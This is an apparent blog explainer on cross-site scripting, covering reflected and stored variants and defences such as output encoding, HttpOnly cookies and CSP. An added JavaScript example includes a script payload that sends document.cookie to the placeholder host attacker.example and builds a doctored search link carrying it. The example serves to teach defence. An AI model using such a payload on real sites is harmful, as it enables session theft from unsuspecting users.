Thursday

Cross-Site Scripting (XSS) - Huh?

You may have heard the term "Cross-Site Scripting", also shortened to "XSS", but it probably got caught by your "geeky stuff" filter. It's one of the most common flaws in web sites, and attackers use it to run their own script inside your browser on a site you trust, usually to get hold of your session, your data and/or your passwords. So, here is a brief and hopefully simple look at what it is.


XSS attacks happen inside your web browser, but the flaw is in the web site. A lot of sites take something you typed and build it into a dynamic web page: a forum post, a comment section, a search box that echoes your query back, or pretty much any other site where you can enter data (Twitter, Facebook, et al). If the site puts that text into the page without "escaping" it (turning characters such as < and > into harmless display-only versions), then text that looks like script is treated by the browser as script, with exactly the same privileges as the site's own code.


Because the injected script runs as if the site had written it, it can read the site's cookies and session tokens, submit forms as you, change what the page shows, or quietly send what you type to a location other than the intended web site; and so it can steal passwords, spread from profile to profile as a "web worm", take over the page you are looking at, and so on. The problems often start with a doctored link in an email or a social media message ("reflected" XSS, where the malicious text travels in the link itself), but in the "stored" variety the script sits in a comment or profile on the site and runs for anyone who merely views that page, no special link required.


A couple of things you can do include (of course) keeping your operating system and browser patched, and selectively allowing scripts to run in your browser. Most people will not do the latter, as it will "break" some sites. Mozilla Firefox, Google Chrome and other Chromium-based derivatives (such as Comodo Dragon) all have add-ons that let you block scripts on a per-site basis; NoScript for Firefox is the best-known example. One caveat worth knowing: an injected script is served by the same site as the real one, so once you have allowed scripts for a site, a script blocker cannot tell the site's own code from an attacker's. Patching and script blocking limit the damage, but they cannot fix the hole in the site.


Mostly though, the onus is on web developers to write their applications so that XSS can't happen in the first place: escaping ("encoding") every piece of user-supplied text at the point it is put into a page, marking session cookies HttpOnly so that script cannot read them, and sending a Content-Security-Policy header to tell browsers where scripts are allowed to come from. As with most complex software, it's a bit of a cat-and-mouse game.
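As an added example (not code from the original post): a toy comment page and search page rendered two ways, the vulnerable way and with output encoding, to show both the "stored" comment case and the "doctored link" (reflected) case described above. All function names (renderCommentVulnerable, escapeHtml, buildDoctoredLink and friends), the site addresses and the attacker's comment are made up for illustration.

```javascript
// Added example, not from the original post. A minimal server-side page
// renderer written two ways, to show how XSS arises and how output
// encoding stops it. Names, addresses and the attacker's input are
// constructed for illustration.

// Constructed attacker input: a "comment" that is really a script. If the
// site drops it into the page verbatim, the browser runs it in the site's
// own context and can read that site's cookies (the "steal your session"
// case in the text). attacker.example is a placeholder hostname.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Vulnerable renderer: user-controlled text is concatenated straight into
// HTML, so whatever the user typed becomes part of the page's markup.
function renderCommentVulnerable(author, comment) {
  return '<div class="comment"><b>' + author + '</b>: ' + comment + '</div>';
}

// Output encoding for HTML text/attribute context: the five characters
// that can change the meaning of HTML are replaced with entities, so user
// input is always displayed and never interpreted. '&' goes first so the
// entities produced by the later replacements are not double-encoded.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened renderer: same layout, but every user-supplied value passes
// through escapeHtml() at the point it is inserted into the page.
function renderCommentSafe(author, comment) {
  return (
    '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
    escapeHtml(comment) + '</div>'
  );
}

// Reflected XSS: a search page that echoes the query back. The "doctored
// link" from the text is just the site's normal search URL with the
// payload as the query parameter; when the victim clicks it, the site
// itself serves the attacker's script back to the victim's browser.
function buildDoctoredLink(searchUrl, query) {
  return searchUrl + '?q=' + encodeURIComponent(query);
}

function renderSearchVulnerable(query) {
  return '<p>Results for: ' + query + '</p>';
}

function renderSearchSafe(query) {
  return '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// Crude stand-in for "would the browser execute this?": does the rendered
// HTML still contain a raw <script> tag? Real browsers have many more ways
// to run script (event-handler attributes, javascript: URLs), which is why
// the fix is encoding on output rather than filtering on input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Walk-through of both cases with the constructed payload.
console.log('stored, vulnerable :', renderCommentVulnerable('mallory', PAYLOAD));
console.log('stored, encoded    :', renderCommentSafe('mallory', PAYLOAD));
console.log('doctored link      :', buildDoctoredLink('https://shop.example/search', PAYLOAD));
console.log('reflected, encoded :', renderSearchSafe(PAYLOAD));
```

The encoded versions still show the attacker's text on the page, angle brackets and all; it just sits there as text instead of running. That is the whole idea of output encoding: the site never has to guess what is "bad", it simply never lets user input become markup.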
